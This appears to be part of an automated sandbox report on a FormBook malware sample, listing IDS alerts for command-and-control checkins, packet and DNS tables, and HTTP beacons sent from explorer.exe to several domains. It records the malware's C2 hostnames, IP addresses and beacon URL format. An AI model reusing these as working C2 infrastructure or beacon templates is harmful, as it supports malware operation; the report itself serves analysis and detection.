2024-10-01T10:05:00.616006+0200	2031412	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49722	3.33.130.190	80	TCP
2024-10-01T10:05:00.616006+0200	2031412	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49723	154.197.185.220	80	TCP
2024-10-01T10:05:00.616006+0200	2031449	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49722	3.33.130.190	80	TCP
2024-10-01T10:05:00.616006+0200	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49722	3.33.130.190	80	TCP
2024-10-01T10:05:00.616006+0200	2031449	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49723	154.197.185.220	80	TCP
2024-10-01T10:05:00.616006+0200	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49723	154.197.185.220	80	TCP
2024-10-01T10:06:02.624066+0200	2031412	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49719	199.59.243.227	80	TCP
2024-10-01T10:06:02.624066+0200	2031449	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49719	199.59.243.227	80	TCP
2024-10-01T10:06:02.624066+0200	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49719	199.59.243.227	80	TCP
2024-10-01T10:06:22.816992+0200	2031412	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49720	154.221.68.229	80	TCP
2024-10-01T10:06:22.816992+0200	2031449	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49720	154.221.68.229	80	TCP
2024-10-01T10:06:22.816992+0200	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49720	154.221.68.229	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 1, 2024 10:05:41.535798073 CEST	49717	80	192.168.2.5	23.227.38.74
Oct 1, 2024 10:05:41.540694952 CEST	80	49717	23.227.38.74	192.168.2.5
Oct 1, 2024 10:05:41.540769100 CEST	49717	80	192.168.2.5	23.227.38.74
Oct 1, 2024 10:05:41.540818930 CEST	49717	80	192.168.2.5	23.227.38.74
Oct 1, 2024 10:05:41.545613050 CEST	80	49717	23.227.38.74	192.168.2.5
Oct 1, 2024 10:05:42.014441013 CEST	80	49717	23.227.38.74	192.168.2.5
Oct 1, 2024 10:05:42.014470100 CEST	80	49717	23.227.38.74	192.168.2.5
Oct 1, 2024 10:05:42.014481068 CEST	80	49717	23.227.38.74	192.168.2.5
Oct 1, 2024 10:05:42.014487028 CEST	80	49717	23.227.38.74	192.168.2.5
Oct 1, 2024 10:05:42.014494896 CEST	80	49717	23.227.38.74	192.168.2.5
Oct 1, 2024 10:05:42.014617920 CEST	49717	80	192.168.2.5	23.227.38.74
Oct 1, 2024 10:05:42.014658928 CEST	49717	80	192.168.2.5	23.227.38.74
Oct 1, 2024 10:05:42.017079115 CEST	80	49717	23.227.38.74	192.168.2.5
Oct 1, 2024 10:05:42.017158031 CEST	49717	80	192.168.2.5	23.227.38.74
Oct 1, 2024 10:05:42.019597054 CEST	80	49717	23.227.38.74	192.168.2.5
Oct 1, 2024 10:06:02.156209946 CEST	49719	80	192.168.2.5	199.59.243.227
Oct 1, 2024 10:06:02.161019087 CEST	80	49719	199.59.243.227	192.168.2.5
Oct 1, 2024 10:06:02.161109924 CEST	49719	80	192.168.2.5	199.59.243.227
Oct 1, 2024 10:06:02.161168098 CEST	49719	80	192.168.2.5	199.59.243.227
Oct 1, 2024 10:06:02.165966034 CEST	80	49719	199.59.243.227	192.168.2.5
Oct 1, 2024 10:06:02.623742104 CEST	80	49719	199.59.243.227	192.168.2.5
Oct 1, 2024 10:06:02.623873949 CEST	80	49719	199.59.243.227	192.168.2.5
Oct 1, 2024 10:06:02.623883963 CEST	80	49719	199.59.243.227	192.168.2.5
Oct 1, 2024 10:06:02.623898029 CEST	80	49719	199.59.243.227	192.168.2.5
Oct 1, 2024 10:06:02.623939991 CEST	49719	80	192.168.2.5	199.59.243.227
Oct 1, 2024 10:06:02.623986006 CEST	49719	80	192.168.2.5	199.59.243.227
Oct 1, 2024 10:06:02.624066114 CEST	49719	80	192.168.2.5	199.59.243.227
Oct 1, 2024 10:06:22.224080086 CEST	49720	80	192.168.2.5	154.221.68.229
Oct 1, 2024 10:06:22.228899956 CEST	80	49720	154.221.68.229	192.168.2.5
Oct 1, 2024 10:06:22.229005098 CEST	49720	80	192.168.2.5	154.221.68.229
Oct 1, 2024 10:06:22.229118109 CEST	49720	80	192.168.2.5	154.221.68.229
Oct 1, 2024 10:06:22.233830929 CEST	80	49720	154.221.68.229	192.168.2.5
Oct 1, 2024 10:06:22.752557993 CEST	49720	80	192.168.2.5	154.221.68.229
Oct 1, 2024 10:06:22.802907944 CEST	80	49720	154.221.68.229	192.168.2.5
Oct 1, 2024 10:06:22.815110922 CEST	80	49720	154.221.68.229	192.168.2.5
Oct 1, 2024 10:06:22.816992044 CEST	49720	80	192.168.2.5	154.221.68.229
Oct 1, 2024 10:06:42.225301981 CEST	49722	80	192.168.2.5	3.33.130.190
Oct 1, 2024 10:06:42.230139971 CEST	80	49722	3.33.130.190	192.168.2.5
Oct 1, 2024 10:06:42.230231047 CEST	49722	80	192.168.2.5	3.33.130.190
Oct 1, 2024 10:06:42.230340958 CEST	49722	80	192.168.2.5	3.33.130.190
Oct 1, 2024 10:06:42.235476017 CEST	80	49722	3.33.130.190	192.168.2.5
Oct 1, 2024 10:06:42.704962015 CEST	80	49722	3.33.130.190	192.168.2.5
Oct 1, 2024 10:06:42.705210924 CEST	80	49722	3.33.130.190	192.168.2.5
Oct 1, 2024 10:06:42.708774090 CEST	49722	80	192.168.2.5	3.33.130.190
Oct 1, 2024 10:06:42.708863020 CEST	49722	80	192.168.2.5	3.33.130.190
Oct 1, 2024 10:06:42.713825941 CEST	80	49722	3.33.130.190	192.168.2.5
Oct 1, 2024 10:07:23.564651966 CEST	49723	80	192.168.2.5	154.197.185.220
Oct 1, 2024 10:07:23.569710016 CEST	80	49723	154.197.185.220	192.168.2.5
Oct 1, 2024 10:07:23.571885109 CEST	49723	80	192.168.2.5	154.197.185.220
Oct 1, 2024 10:07:23.571968079 CEST	49723	80	192.168.2.5	154.197.185.220
Oct 1, 2024 10:07:23.576785088 CEST	80	49723	154.197.185.220	192.168.2.5
Oct 1, 2024 10:07:24.055922985 CEST	80	49723	154.197.185.220	192.168.2.5
Oct 1, 2024 10:07:24.056010962 CEST	49723	80	192.168.2.5	154.197.185.220
Oct 1, 2024 10:07:24.056056976 CEST	49723	80	192.168.2.5	154.197.185.220
Oct 1, 2024 10:07:24.060947895 CEST	80	49723	154.197.185.220	192.168.2.5
Oct 1, 2024 10:08:04.907994032 CEST	49724	80	192.168.2.5	151.101.0.119
Oct 1, 2024 10:08:04.912971020 CEST	80	49724	151.101.0.119	192.168.2.5
Oct 1, 2024 10:08:04.913078070 CEST	49724	80	192.168.2.5	151.101.0.119
Oct 1, 2024 10:08:04.913273096 CEST	49724	80	192.168.2.5	151.101.0.119
Oct 1, 2024 10:08:04.918031931 CEST	80	49724	151.101.0.119	192.168.2.5
Oct 1, 2024 10:08:05.381761074 CEST	80	49724	151.101.0.119	192.168.2.5
Oct 1, 2024 10:08:05.381786108 CEST	80	49724	151.101.0.119	192.168.2.5
Oct 1, 2024 10:08:05.381882906 CEST	49724	80	192.168.2.5	151.101.0.119
Oct 1, 2024 10:08:05.381930113 CEST	49724	80	192.168.2.5	151.101.0.119
Oct 1, 2024 10:08:05.386691093 CEST	80	49724	151.101.0.119	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 1, 2024 10:05:41.492013931 CEST	59168	53	192.168.2.5	1.1.1.1
Oct 1, 2024 10:05:41.534760952 CEST	53	59168	1.1.1.1	192.168.2.5
Oct 1, 2024 10:06:02.038079023 CEST	63136	53	192.168.2.5	1.1.1.1
Oct 1, 2024 10:06:02.155446053 CEST	53	63136	1.1.1.1	192.168.2.5
Oct 1, 2024 10:06:21.850651026 CEST	55253	53	192.168.2.5	1.1.1.1
Oct 1, 2024 10:06:22.223238945 CEST	53	55253	1.1.1.1	192.168.2.5
Oct 1, 2024 10:06:42.210020065 CEST	60854	53	192.168.2.5	1.1.1.1
Oct 1, 2024 10:06:42.224543095 CEST	53	60854	1.1.1.1	192.168.2.5
Oct 1, 2024 10:07:02.651340961 CEST	55536	53	192.168.2.5	1.1.1.1
Oct 1, 2024 10:07:03.505281925 CEST	53	55536	1.1.1.1	192.168.2.5
Oct 1, 2024 10:07:23.100765944 CEST	61695	53	192.168.2.5	1.1.1.1
Oct 1, 2024 10:07:23.560035944 CEST	53	61695	1.1.1.1	192.168.2.5
Oct 1, 2024 10:07:44.185404062 CEST	54313	53	192.168.2.5	1.1.1.1
Oct 1, 2024 10:07:44.194782972 CEST	53	54313	1.1.1.1	192.168.2.5
Oct 1, 2024 10:08:04.821366072 CEST	59052	53	192.168.2.5	1.1.1.1
Oct 1, 2024 10:08:04.861135960 CEST	53	59052	1.1.1.1	192.168.2.5
Oct 1, 2024 10:08:25.243011951 CEST	62550	53	192.168.2.5	1.1.1.1
Oct 1, 2024 10:08:26.165440083 CEST	53	62550	1.1.1.1	192.168.2.5
Oct 1, 2024 10:08:45.948699951 CEST	52412	53	192.168.2.5	1.1.1.1
Oct 1, 2024 10:08:46.041506052 CEST	53	52412	1.1.1.1	192.168.2.5
Oct 1, 2024 10:09:27.151361942 CEST	53563	53	192.168.2.5	1.1.1.1
Oct 1, 2024 10:09:27.166568041 CEST	53	53563	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 1, 2024 10:05:41.492013931 CEST	192.168.2.5	1.1.1.1	0x6ea6	Standard query (0)	www.wergol.com	A (IP address)	IN (0x0001)	false
Oct 1, 2024 10:06:02.038079023 CEST	192.168.2.5	1.1.1.1	0x62f1	Standard query (0)	www.os9user.com	A (IP address)	IN (0x0001)	false
Oct 1, 2024 10:06:21.850651026 CEST	192.168.2.5	1.1.1.1	0xaf8d	Standard query (0)	www.mksport-app.com	A (IP address)	IN (0x0001)	false
Oct 1, 2024 10:06:42.210020065 CEST	192.168.2.5	1.1.1.1	0x436c	Standard query (0)	www.raidsa.xyz	A (IP address)	IN (0x0001)	false
Oct 1, 2024 10:07:02.651340961 CEST	192.168.2.5	1.1.1.1	0x60af	Standard query (0)	www.manhuafeifei.xyz	A (IP address)	IN (0x0001)	false
Oct 1, 2024 10:07:23.100765944 CEST	192.168.2.5	1.1.1.1	0xc239	Standard query (0)	www.horxncnt.xyz	A (IP address)	IN (0x0001)	false
Oct 1, 2024 10:07:44.185404062 CEST	192.168.2.5	1.1.1.1	0x5dbb	Standard query (0)	www.cttlca.click	A (IP address)	IN (0x0001)	false
Oct 1, 2024 10:08:04.821366072 CEST	192.168.2.5	1.1.1.1	0xc7f9	Standard query (0)	www.flywatchsecurity.com	A (IP address)	IN (0x0001)	false
Oct 1, 2024 10:08:25.243011951 CEST	192.168.2.5	1.1.1.1	0x6e	Standard query (0)	www.21556934.com	A (IP address)	IN (0x0001)	false
Oct 1, 2024 10:08:45.948699951 CEST	192.168.2.5	1.1.1.1	0xd27	Standard query (0)	www.valo.games	A (IP address)	IN (0x0001)	false
Oct 1, 2024 10:09:27.151361942 CEST	192.168.2.5	1.1.1.1	0x1ee0	Standard query (0)	www.avai66.xyz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 1, 2024 10:05:41.534760952 CEST	1.1.1.1	192.168.2.5	0x6ea6	No error (0)	www.wergol.com	shops.myshopify.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 1, 2024 10:05:41.534760952 CEST	1.1.1.1	192.168.2.5	0x6ea6	No error (0)	shops.myshopify.com		23.227.38.74	A (IP address)	IN (0x0001)	false
Oct 1, 2024 10:06:02.155446053 CEST	1.1.1.1	192.168.2.5	0x62f1	No error (0)	www.os9user.com		199.59.243.227	A (IP address)	IN (0x0001)	false
Oct 1, 2024 10:06:22.223238945 CEST	1.1.1.1	192.168.2.5	0xaf8d	No error (0)	www.mksport-app.com		154.221.68.229	A (IP address)	IN (0x0001)	false
Oct 1, 2024 10:06:42.224543095 CEST	1.1.1.1	192.168.2.5	0x436c	No error (0)	www.raidsa.xyz	raidsa.xyz		CNAME (Canonical name)	IN (0x0001)	false
Oct 1, 2024 10:06:42.224543095 CEST	1.1.1.1	192.168.2.5	0x436c	No error (0)	raidsa.xyz		3.33.130.190	A (IP address)	IN (0x0001)	false
Oct 1, 2024 10:06:42.224543095 CEST	1.1.1.1	192.168.2.5	0x436c	No error (0)	raidsa.xyz		15.197.148.33	A (IP address)	IN (0x0001)	false
Oct 1, 2024 10:07:03.505281925 CEST	1.1.1.1	192.168.2.5	0x60af	Name error (3)	www.manhuafeifei.xyz	none	none	A (IP address)	IN (0x0001)	false
Oct 1, 2024 10:07:23.560035944 CEST	1.1.1.1	192.168.2.5	0xc239	No error (0)	www.horxncnt.xyz		154.197.185.220	A (IP address)	IN (0x0001)	false
Oct 1, 2024 10:07:44.194782972 CEST	1.1.1.1	192.168.2.5	0x5dbb	Name error (3)	www.cttlca.click	none	none	A (IP address)	IN (0x0001)	false
Oct 1, 2024 10:08:04.861135960 CEST	1.1.1.1	192.168.2.5	0xc7f9	No error (0)	www.flywatchsecurity.com	flywatchsecurity.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 1, 2024 10:08:04.861135960 CEST	1.1.1.1	192.168.2.5	0xc7f9	No error (0)	flywatchsecurity.com		151.101.0.119	A (IP address)	IN (0x0001)	false
Oct 1, 2024 10:08:04.861135960 CEST	1.1.1.1	192.168.2.5	0xc7f9	No error (0)	flywatchsecurity.com		151.101.64.119	A (IP address)	IN (0x0001)	false
Oct 1, 2024 10:08:04.861135960 CEST	1.1.1.1	192.168.2.5	0xc7f9	No error (0)	flywatchsecurity.com		151.101.128.119	A (IP address)	IN (0x0001)	false
Oct 1, 2024 10:08:04.861135960 CEST	1.1.1.1	192.168.2.5	0xc7f9	No error (0)	flywatchsecurity.com		151.101.192.119	A (IP address)	IN (0x0001)	false
Oct 1, 2024 10:08:46.041506052 CEST	1.1.1.1	192.168.2.5	0xd27	Name error (3)	www.valo.games	none	none	A (IP address)	IN (0x0001)	false
Oct 1, 2024 10:09:27.166568041 CEST	1.1.1.1	192.168.2.5	0x1ee0	Name error (3)	www.avai66.xyz	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.wergol.com

www.os9user.com

www.mksport-app.com

www.raidsa.xyz

www.horxncnt.xyz

www.flywatchsecurity.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49717	23.227.38.74	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:05:41.540818930 CEST	166	OUT	GET /hy08/?GxlX=76ARE7XQpOejeJ4AXgyv9+sF91x02cjLA3TRMrZhHEY9TEByi8vF89DJ/cM7klw0Rkk8&DVRXbd=tXIxBhEhlzJLR HTTP/1.1 Host: www.wergol.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 1, 2024 10:05:42.014441013 CEST	1236	IN	HTTP/1.1 403 Forbidden Date: Tue, 01 Oct 2024 08:05:41 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4514 Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: max-age=15 Expires: Tue, 01 Oct 2024 08:05:56 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Juvm0SPz3sAHG%2FBUT138ZSlgrVuD0SkVy1HOtfpCxsNHwst3jIY1Gw7vmUFRxncMYqglCz91MflmtJTsHRmOqWUnQyNLqAjFd7w4qYWs%2FwiEr60fOvuRMlHGszd6KVMM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Server-Timing: cfRequestDuration;dur=9.999752 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-Download-Options: noopen Server: cloudflare CF-RAY: 8cbaf2f93d32188d-EWR Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e [TRUNCATED] Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="C
Oct 1, 2024 10:05:42.014470100 CEST	1236	IN	Data Raw: 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 Data Ascii: ontent-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="styl
Oct 1, 2024 10:05:42.014481068 CEST	1236	IN	Data Raw: 6f 6d 3c 2f 68 32 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 68 65 61 64 65 72 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 65 63 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e Data Ascii: om</h2> </div>... /.header --> <div class="cf-section cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot err
Oct 1, 2024 10:05:42.014487028 CEST	1236	IN	Data Raw: 20 62 6f 74 74 6f 6d 20 6f 66 20 74 68 69 73 20 70 61 67 65 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 73 65 63 74 69 Data Ascii: bottom of this page.</p> </div> </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border
Oct 1, 2024 10:05:42.014494896 CEST	392	IN	Data Raw: 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 Data Ascii: ntListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;document.addEventListener&&a.addEventListener("DOMContentLoaded",d)})();</script></div>... /.error-footer -

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49719	199.59.243.227	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:06:02.161168098 CEST	167	OUT	GET /hy08/?GxlX=7jBziBoNeaZ0YBYCWuyuiMj/CYrZJe3GZSyGqEoVCgHfq7+BCveVTDnkVKPyAZoe4JtD&DVRXbd=tXIxBhEhlzJLR HTTP/1.1 Host: www.os9user.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 1, 2024 10:06:02.623742104 CEST	1236	IN	HTTP/1.1 200 OK date: Tue, 01 Oct 2024 08:06:01 GMT content-type: text/html; charset=utf-8 content-length: 1322 x-request-id: bc2d180f-83e2-44f2-a27d-383717e1ffc4 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CoaXIYTNmt+8twlP9CTUGScu2wS16sLCLVgz7ArlJWnuHhgOgWhQ7xx1EVJ4auYr3XVieI+thUu6IpZP8XeuxQ== set-cookie: parking_session=bc2d180f-83e2-44f2-a27d-383717e1ffc4; expires=Tue, 01 Oct 2024 08:21:02 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 43 6f 61 58 49 59 54 4e 6d 74 2b 38 74 77 6c 50 39 43 54 55 47 53 63 75 32 77 53 31 36 73 4c 43 4c 56 67 7a 37 41 72 6c 4a 57 6e 75 48 68 67 4f 67 57 68 51 37 78 78 31 45 56 4a 34 61 75 59 72 33 58 56 69 65 49 2b 74 68 55 75 36 49 70 5a 50 38 58 65 75 78 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CoaXIYTNmt+8twlP9CTUGScu2wS16sLCLVgz7ArlJWnuHhgOgWhQ7xx1EVJ4auYr3XVieI+thUu6IpZP8XeuxQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Oct 1, 2024 10:06:02.623873949 CEST	224	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYmMyZDE4MGYtODNlMi00NGYyLWEyN2QtMzgzNzE3ZTFmZmM0IiwicGFnZV9
Oct 1, 2024 10:06:02.623883963 CEST	551	IN	Data Raw: 30 61 57 31 6c 49 6a 6f 78 4e 7a 49 33 4e 7a 59 35 4f 54 59 79 4c 43 4a 77 59 57 64 6c 58 33 56 79 62 43 49 36 49 6d 68 30 64 48 41 36 4c 79 39 33 64 33 63 75 62 33 4d 35 64 58 4e 6c 63 69 35 6a 62 32 30 76 61 48 6b 77 4f 43 38 2f 52 33 68 73 57 Data Ascii: 0aW1lIjoxNzI3NzY5OTYyLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cub3M5dXNlci5jb20vaHkwOC8/R3hsWD03akJ6aUJvTmVhWjBZQllDV3V5dWlNai9DWXJaSmUzR1pTeUdxRW9WQ2dIZnE3K0JDdmVWVERua1ZLUHlBWm9lNEp0RFx1MDAyNkRWUlhiZD10WEl4QmhFaGx6SkxSIiwicGFnZV9tZXRob2QiOiJHRVQiLCJwYW

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49720	154.221.68.229	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:06:22.229118109 CEST	171	OUT	GET /hy08/?GxlX=NioFYaTFIvMJJp+7ScZBWsfgKUzei2ToAwpis545Pph8LP+guwZTQ54AM67XLgRQsCTP&DVRXbd=tXIxBhEhlzJLR HTTP/1.1 Host: www.mksport-app.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49722	3.33.130.190	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:06:42.230340958 CEST	166	OUT	GET /hy08/?GxlX=30efH6i7Pz0nBTvTyaS27TzcwE/B1ZxvPeuscSnkTZUQOLn/CwAUU0gdfCR3da34oWtV&DVRXbd=tXIxBhEhlzJLR HTTP/1.1 Host: www.raidsa.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 1, 2024 10:06:42.704962015 CEST	349	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 01 Oct 2024 08:06:42 GMT Content-Type: text/html Content-Length: 209 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 47 78 6c 58 3d 33 30 65 66 48 36 69 37 50 7a 30 6e 42 54 76 54 79 61 53 32 37 54 7a 63 77 45 2f 42 31 5a 78 76 50 65 75 73 63 53 6e 6b 54 5a 55 51 4f 4c 6e 2f 43 77 41 55 55 30 67 64 66 43 52 33 64 61 33 34 6f 57 74 56 26 44 56 52 58 62 64 3d 74 58 49 78 42 68 45 68 6c 7a 4a 4c 52 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?GxlX=30efH6i7Pz0nBTvTyaS27TzcwE/B1ZxvPeuscSnkTZUQOLn/CwAUU0gdfCR3da34oWtV&DVRXbd=tXIxBhEhlzJLR"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49723	154.197.185.220	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:07:23.571968079 CEST	168	OUT	GET /hy08/?GxlX=J+fUwLE1cqwAibtDCdy9vP1S8G5oesFXJDqwJASvo9tHD3nGP7GVc6KavM+iw+vNh4vC&DVRXbd=tXIxBhEhlzJLR HTTP/1.1 Host: www.horxncnt.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

